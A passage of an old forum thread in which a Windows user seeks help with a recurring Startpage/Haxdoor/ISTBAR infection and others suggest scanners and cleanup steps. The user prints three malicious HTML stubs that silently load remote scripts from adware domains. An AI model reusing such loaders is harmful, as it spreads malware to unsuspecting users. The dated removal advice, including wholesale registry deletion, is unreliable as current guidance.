Comment:
I have a virus or maybe more and I have tried everything, the best help I get is "format your hard drive"...;( (must be a better way.. that means they win)
Symptoms:
AVG keeps popping up with You have a virus: Startpage.10.AE and deletes "mtwirl.dll" (this reaccures about every 30 min when ever connected to the internet) In addition there is something creating "tempf##.exe" files that try to access the internet starting with "tempf01.exe, tempf02.exe all the way to tempf40.exe or so" also there is one now called tempf0;.exe. All of which return if deleted. there are 3 new Icons on the desktop called "as" "bad" and "156172"
If I rename them to .txt files they say:

<html>
<body>
<script language="javascript" type="text/javascript" src="http://static.windupdates.com/prompts/a270ae77/a679a0.js"></script>
<script language="javascript" type="text/javascript">self.focus();</script>
</body>
</html>

and

<html>
<body>
<iframe id="content" style="position:absolute; visibility:hidden;"></iframe>
<script language="JavaScript" src="http://www.mt-download.com/mtrslib2.js"></script>
<script language="JavaScript">
mtrslib_uid = '4205';
mtrslib_retry = 1;
mt_set_onload();
</script>
</body>
</html>

and

<html>
<body>
<script language="JavaScript" type="text/JavaScript" src="http://install.xxxtoolbar.com/ist/scripts/prompt.php?event_type=onload&recurrence=always&retry=0&loadfirst=0&delayload=0&account_id=156172&adid=a1101746764"></script>
</body>
</html>

I think I have gotten rid of the majority of these problems however the biggest thing is that all of the above keep coming back.

Already tried:
No help from the Avg trogan discription (it just gives me standard startpage discriptions)
System restore is turned off and has been for a while, I keep checking to make sure.
Hijack this= cleaned
cwsreader= no problems
other on line virus/trojan scanners = no problems
trogen remover = no problems
trogen hunter = no problems
followed steps to remove xxx.toolbar (none of the fix reg entries existed)
tried varius other start page fixes including but not limited to Trojan.startpage.E (none of the fix reg entries existed)
tried msconfig and put ";" before the only two courious looking entries (Indigo rose ;C:\WINDOWS\iun3405.exe=1 and Gravity well ;licno=DEMO ;authcode=DEMO)
I scanned the registry and deleted all keys that had mtwirl in them (they just come back)
particularly HKEY_CLASSES_ROOT\CLSID\{DABB03E9-AC0D-3740-E3E5-4B37C80837E5}\InProcServer32
I scanned the registry and deleted all keys that had tempf
particularly HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Explorer Bars\{C4EE31F3-4768-11D2-BE5C-00A0C9A83DA1}
I scanned the registry for all search assistant entries and deleted them (I was frustrated...ended up loosing the little guy (dog or wizzard guy)on windows startmenu search---I'll fix that later)
oh ya I updated windows recommended servious packs too.
tried spybot s&D and adaware (both are updated as well as my AVG)

other info
the Ip that the tempf files tries to go to is Destination IP:127.0.0.1
the port used is Port1789
(caught by zone alarm every 3 min. or so)

my start page is fine, no redirects its just the annoyance of the mtwirl keeps trying to install, and those tempf files keep trying to access the internet. Oh ya one more thing. the avg email scanner, it kept popping up saying I was emailing various places, I use hotmail so I dont get it but it seems to have stopped during some point of the fixes I have tried...

ok any ideas?

thank you

I just had good luck with this site and its online scanner. It helped where avg,spy bot,and many others didnt. Hope it works out. www.trendmicro.com/

By having tried everything, do you mean that you have done a thourough virus scan, followed the instructions explicitly and still have the problem you describe? It looks like you are swinging wildly at a great number of things all at the same time. If not, the free scan at trendmicro.com is a starting place. Your system appears to be getting reinfected as soon as you connect again. A competent virus program up and RUNNING is a must before further exposure. By the way, are your important files backed up? You may have to do a clean install of XP to correct everything you have in trouble.

Have a look at this link below and see as to whether you have the same problem

http://forums.maddoktor2.com/index.php?showtopic=304

1) Download the following three items...

McAfee Stinger
http://vil.nai.com/vil/stinger/

Trend Sysclean Package
http://www.trendmicro.com/download/dcs.asp

Latest Trend signature files.
http://www.trendmicro.com/download/pattern.asp

Create a directory.
On drive "C:\"
(e.g., "c:\New Folder")
or the desktop
(e.g., "C:\Documents and Settings\lipman\Desktop\New Folder")

Download SYSCLEAN.COM and place it in that directory.
Download the signature files (pattern files) by obtaining the ZIP file.
For example; lpt351.zip

Extract the contents of the ZIP file and place the contents in the same directory as
SYSCLEAN.COM.

2) If you are using WinME or WinXP, disable System Restore
http://vil.nai.com/vil/SystemHelpDocs/DisableSysRestore.htm
3) Reboot your PC into Safe Mode and shutdown as many applications as possible
4) Using both the Trend Sysclean utility and Stinger, perform a Full Scan of your
platform and clean/delete any infectors found
5) Restart your PC and perform a "final" Full Scan of your platform using both.
6) If you are using WinME or WinXP, Re-enable System Restore and re-apply any
System Restore preferences, (e.g. HD space to use suggested 400 ~ 600MB),
7) Reboot your PC.
8) If you are using WinME or WinXP, create a new Restore point

Also have a look at Norton website

http://tinyurl.com/3b9ps

thanks for the suggestions, I am trying them now. I will let you know how they work

and to ClydeB, ya I followed the instructions explicitly, all the way down to which things to delete and when to restart. I do have a question though, do you thing AVG in not a competent virus program?, Ive heard nothing but good things about it? (but isn't helping me here..)
and I backed up my files with AVG start up disk and registry is backed up with System Mechanic. thanks..

thank you

I can't comment on AVG. I was concerned that you would further expose your PC to damage by NOT using any protection. How about backup, could you tolerate a clean install if need?

ya, I suppose but only at a last resort... mainly cause im lazy. lol. Mostly scared of locating my xp disk and all the xp downloads that I think i would have to redownload (56k modem)....

the www.trendmicro.com/ that was suggested above (thought I ran it twice before) this time picked up the virus making the tmpf files and problem dll

Troj_Haxdoor.AY OsCZE.dll
Troj_ISTBAR.AL (the tmpf files)

couldn't fix them though with the online scanner. trying to delete OxCZE.dll with killbox and I've downloaded the fixes that
RoadRunner suggested, will try that now. also found the troj's in the scan list for A2 trojen scanner, downloading free version now, will try that and this trial edition of a program from proantivirus.com, says it scans for haxdoor.ay on its site. we will see, ok, now I will try the rest. I will let you know if they work

thank you

Hey ! there ... I use both Avg free and pro version on a few computers , I don't have problems with them both ... You might want to try AVG Forum site , have a look at the link below

http://forum.grisoft.cz/freeforum/index.php?0